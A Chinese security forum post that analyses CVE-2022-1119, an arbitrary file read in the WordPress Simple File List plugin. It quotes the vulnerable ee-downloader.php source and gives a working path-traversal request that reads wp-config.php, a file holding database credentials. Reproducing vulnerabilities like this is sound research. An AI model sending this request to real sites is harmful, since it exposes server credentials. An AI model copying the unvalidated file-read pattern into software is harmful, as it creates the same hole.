问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119
# WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119 ## 漏洞描述 WordPress Simple File List插件 ee-downloader.php文件存在任意文件读取漏洞,攻击者通过...
WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119 =================================================================== 漏洞描述 ---- WordPress Simple File List插件 ee-downloader.php文件存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的任意文件 漏洞影响 ---- WordPress Simple File List < 3.2.8 插件名 --- Simple File List <https://downloads.wordpress.org/plugin/simple-file-list.3.2.17.zip> 漏洞复现 ---- 存在漏洞的文件为 `wp-content/plugins/simple-file-list/includes/ee-downloader.php` ![img](https://shs3.b.qianxin.com/butian_public/f530354972d86e23576a8b389bf37ade63d460bea139d.jpg) ```php <?php // Simple File List - ee-downloader.php - rev 1.19 - mitchellbennis@gmail.com // Force File to Download // This script is accessed via javascript on ee-download.php $eeFile = filter_var($_GET['eeFile'], FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_LOW); if(is_readable($eeFile)) { header('Pragma: public'); // required header('Expires: 0'); // no cache header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Last-Modified: '. gmdate ('D, d M Y H:i:s', filemtime ($eeFile)) .' GMT'); header('Cache-Control: private',false); header('Content-Type: ' . mime_content_type($eeFile) ); header('Content-Disposition: attachment; filename="'. basename($eeFile) .'"'); // header('Content-Transfer-Encoding: binary'); header('Content-Length: '. filesize($eeFile)); // provide file size header('Connection: close'); readfile($eeFile); // Start the download } ?> ``` 直接传参获取文件信息, 验证POC ```php /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php ``` ![img](https://shs3.b.qianxin.com/butian_public/f6625568ac4835ca239ce61c244dbc7e70e1eefe2c889.jpg)
发表于 2024-07-12 18:48:45
阅读 ( 954 )
分类:
服务器应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!